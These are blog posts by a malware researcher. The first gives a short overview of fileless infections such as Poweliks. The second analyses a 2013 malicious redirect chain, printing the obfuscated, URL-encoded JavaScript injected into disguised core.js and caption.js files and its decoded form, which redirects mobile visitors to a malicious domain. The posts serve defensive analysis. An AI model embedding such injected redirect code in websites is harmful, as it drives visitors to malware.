File less Infection-1

Leave a comment

A File less infection is one where the infection never never the disk and it always remains in Primary memory.

As no file is over disk so it is hard for security products to detect and remove such kind of infections. The first ever case of File less infection was seen in early 2000, with the worm name Code Red, where the worm was using IIS server Remote Code execution  exploit and was injecting the malware payload in memory.

Though the issue with such kind of malware is they are gone after the reboot. SO they were not persistent and as they were not persistent so targeting the machine whose up time is very low (For example Home PC) is not very useful.

But with in Year 2014 Poweliks did the break though and found mechanism of remaining persistent or reinfecting the victim after the reboot.
So, we can call it as surviving the reboot.

The malware was found to be spreading by notorious Exploit Kit Angler.

The poweliks found a very interesting way to remain persistent in memory by injecting the payload in run registry entry so when system restart it reinfect itself.

And it create 2 component

  1. Watchdog: Which keep an eye over registry entry, if entry is removed it recreate it. This part is always in memory.
  2. Payload: The real payload of malware, which perform the malware action.

In Last couple of year’s I have done some in deep research over File-less infection,

As a result of which I was able to publish few research papers.
My Research papers can be found over
1) One-Click File less infection : Presented At Virus Bulletin 2016, Denver
2) Living Off the land and file less attack techniques : Published with Symantec

Payload of malware is in registry.

filelessmalware3

This was a brief overview of file less infection.
I hope you guys like it, will try deep diving into the matter in next blog post.
Cheers

Advertisements

How to handle the redirection from malicious websites..!!

1 Comment

The journey starts with a link of urlquery.com website.

http://urlquery.net/report.php?id=2495895

Where this link tell us about a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL is normal one if you ignore the .ru thing 🙂

When I tried to execute this one over my Browser they redirected me to

https://www.google.com/search?q=wallmart

Then I have to use wget to get the download this file.

After downloading this file I tried to open this in Browser and again the same redirection. Grrr..

Let’s see the reply header

HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Date: Thu, 16 May 2013 14:26:15 GMT
 Content-Type: text/html
 Connection: keep-alive
 Last-Modified: Thu, 16 May 2013 14:03:59 GMT
 ETag: "6bc8011-2e9-4dcd6567d31c0"
 Accept-Ranges: bytes
 Content-Length: 745

Ok so we all know the website is not down and it’s redirecting, as we have the code so let’s take look over the code which is redirecting us.

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
location.replace("h00p://virgin-altantic[dot]net/news/ask-index.php");//--></script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious ok let’s see what virustotal say about this this website.

https://www.virustotal.com/en/url/b9ae75bcf2d8bc16b2f14b1ca12eafb755ff6d18fb9beb4b3a9f877c8a4b177a/analysis/1368878313/

and

https://www.virustotal.com/en/url/3077275f26bf120619a28734abebf7d321efa8be0c43b6bb0954d5092337a873/analysis/1368878322/

The above 2 are the URL with which I started with and another one is of

h00p://polycontract[dot]ru

So, they got redirection over every webpage so I have to download every thing using wget and then to analyze it, no GUI only code 😦

2 different analysis anyways good thing is it’s still showing us that it is malicious 🙂

After downloading the 2nd file I analysed it and find out there are 2 java scripts in that one.

So, I downloaded those 2 files respectively and the link were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyze these 2 files. The virus total reports are

For core.js

https://www.virustotal.com/en/file/6f9229b2551587de22aa693b5da6e5ff350d521825b675a3549d0e09cccd67a1/analysis/1368878881/

For caption.js

https://www.virustotal.com/en/file/66b9077dc4b1c53d1d4bb7e9d3e333a5a3a3aae4b9d01f96b5c8d5c722208e94/analysis/1368878892/

Indeed they are malicious.

Time to take a look inside these 2

document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%37%20%31%3D%38%2E%39%2E%61%28%2F%28%62%29%7C%28%65%29%7C%28%66%29%7C%28%68%29%7C%28%6A%29%7C%28%6B%29%7C%28%6C%29%7C%28%6D%29%7C%28%6E%29%7C%28%6F%29%7C%28%70%29%7C%28%71%29%7C%28%72%29%7C%28%73%29%7C%28%75%2D%29%7C%28%77%29%7C%28%78%29%7C%28%79%29%7C%28%7A%29%7C%28%41%29%7C%28%42%29%7C%28%43%29%7C%28%44%29%7C%28%45%29%7C%28%46%29%7C%28%47%29%7C%28%30%2D%63%29%7C%28%30%2D%64%29%7C%28%30%2D%67%29%7C%28%48%2D%29%7C%28%49%29%7C%28%4A%29%7C%28%32%29%7C%28%4B%29%7C%28%4C%29%7C%28%4D%29%7C%28%4E%2D%29%7C%28%4F%29%7C%28%50%29%7C%28%51%2D%29%7C%28%52%29%7C%28%53%29%7C%28%54%29%7C%28%55%29%7C%28%56%29%7C%28%57%29%7C%28%58%29%7C%28%59%29%7C%28%5A%29%7C%28%31%30%29%7C%28%31%31%29%7C%28%31%32%29%7C%28%31%33%29%7C%28%31%34%29%7C%28%31%35%29%7C%28%31%36%29%7C%28%31%37%29%7C%28%31%38%2D%29%7C%28%31%39%2D%29%7C%28%31%61%29%7C%28%31%62%29%7C%28%31%63%2D%29%7C%28%31%64%29%7C%28%31%65%2D%29%7C%28%31%66%29%7C%28%31%67%29%7C%28%31%68%29%7C%28%31%69%29%7C%28%31%6A%2D%29%7C%28%31%6B%29%7C%28%74%2D%31%6C%29%7C%28%31%6D%29%7C%28%31%6E%2D%29%7C%28%31%6F%29%7C%28%31%70%2D%29%7C%28%31%71%29%7C%28%31%72%29%7C%28%31%73%2D%76%29%7C%28%31%74%29%7C%28%31%75%29%7C%28%33%2D%29%7C%28%31%76%29%7C%28%31%77%29%7C%28%31%78%29%7C%28%31%79%29%7C%28%31%7A%29%7C%28%34%29%7C%28%34%29%7C%28%35%29%7C%28%35%2D%29%7C%28%36%2E%31%41%29%7C%28%36%2E%31%42%29%7C%28%31%43%2E%31%44%29%7C%28%31%45%29%7C%28%31%46%29%7C%28%31%47%29%7C%28%31%48%29%7C%28%32%29%7C%28%33%29%7C%28%31%49%29%7C%28%31%4A%29%7C%28%31%4B%29%7C%28%31%4C%29%7C%28%31%4D%29%7C%28%31%4E%29%7C%28%31%4F%29%7C%28%31%50%2E%31%51%29%7C%28%31%52%29%7C%28%31%53%29%2F%69%29%3B%31%54%28%31%29%7B%31%55%2E%31%56%2E%31%57%3D%22%31%58%22%7D%27%2C%36%32%2C%31%32%32%2C%27%6C%67%7C%69%73%6D%6F%62%69%6C%65%7C%6D%69%64%70%7C%77%61%70%7C%77%69%6E%77%7C%78%64%61%7C%75%70%7C%76%61%72%7C%6E%61%76%69%67%61%74%6F%72%7C%75%73%65%72%41%67%65%6E%74%7C%6D%61%74%63%68%7C%61%63%73%7C%7C%7C%61%6C%61%76%7C%61%6C%63%61%7C%7C%61%6D%6F%69%7C%7C%61%75%64%69%7C%61%73%74%65%7C%61%76%61%6E%7C%62%65%6E%71%7C%62%69%72%64%7C%62%6C%61%63%7C%62%6C%61%7A%7C%62%72%65%77%7C%63%65%6C%6C%7C%63%6C%64%63%7C%7C%63%6D%64%7C%7C%64%61%6E%67%7C%64%6F%63%6F%7C%65%72%69%63%7C%68%69%70%74%7C%69%6E%6E%6F%7C%69%70%61%71%7C%6A%61%76%61%7C%6A%69%67%73%7C%6B%64%64%69%7C%6B%65%6A%69%7C%6C%65%6E%6F%7C%6C%67%65%7C%6D%61%75%69%7C%6D%61%78%6F%7C%6D%69%74%73%7C%6D%6D%65%66%7C%6D%6F%62%69%7C%6D%6F%74%7C%6D%6F%74%6F%7C%6D%77%62%70%7C%6E%65%63%7C%6E%65%77%74%7C%6E%6F%6B%69%7C%6F%70%77%76%7C%70%61%6C%6D%7C%70%61%6E%61%7C%70%61%6E%74%7C%70%64%78%67%7C%70%68%69%6C%7C%70%6C%61%79%7C%70%6C%75%63%7C%70%6F%72%74%7C%70%72%6F%78%7C%71%74%65%6B%7C%71%77%61%70%7C%73%61%67%65%7C%73%61%6D%73%7C%73%61%6E%79%7C%73%63%68%7C%73%65%63%7C%73%65%6E%64%7C%73%65%72%69%7C%73%67%68%7C%73%68%61%72%7C%73%69%65%7C%73%69%65%6D%7C%73%6D%61%6C%7C%73%6D%61%72%7C%73%6F%6E%79%7C%73%70%68%7C%73%79%6D%62%7C%6D%6F%7C%74%65%6C%69%7C%74%69%6D%7C%74%6F%73%68%7C%74%73%6D%7C%75%70%67%31%7C%75%70%73%69%7C%76%6B%7C%76%6F%64%61%7C%77%33%63%73%7C%77%61%70%61%7C%77%61%70%69%7C%77%61%70%70%7C%77%61%70%72%7C%77%65%62%63%7C%62%72%6F%77%73%65%72%7C%6C%69%6E%6B%7C%77%69%6E%64%6F%77%73%7C%63%65%7C%69%65%6D%6F%62%69%6C%65%7C%6D%69%6E%69%7C%6D%6D%70%7C%73%79%6D%62%69%61%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

The malicious code is common for both of the files.

After decrypting it what I got is

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

Which is finally redirecting you to

h00p://online2you[dot]org/search.php?sid=1

Next task was to get the payload as most probably this was the site where they have hidden the treasure.

But unfortunately this was down error 404

h00p://online2you[dot]org/search.php?sid=1
Resolving online2you.org... 67.215.66.132
 Connecting to online2you.org|67.215.66.132|:80... connected.
 HTTP request sent, awaiting response... 404 Not Found
 2013-05-18 17:44:43 ERROR 404: Not Found.

I thought as there is redirection everywhere then this might be because of different location, So I tried it with proxy os US,Russia and some 3-4 more sut same result for every thing.

is it me or everyone else is unable to download the contents from this site?

ok let’s see the who is for the website

whois for  h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
nserver:       ns1.hosting.reg.ru.
nserver:       ns2.hosting.reg.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you: http://urlquery.net/report.php?id=1747064

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Domain Name:ONLINE2YOU.ORG
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring Registrar:Bizcn.com, Inc. (R1248-LROR)
Status:OK Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
 remarks: Registration information: http://www.pir.org

And in last snap shot of all the the files which I have gathered

Screen Shot 2013-05-18 at 5.55.55 PM

This was my Journey and this was the end.

Your Inputs / Criticism are required

#MalwareMustDie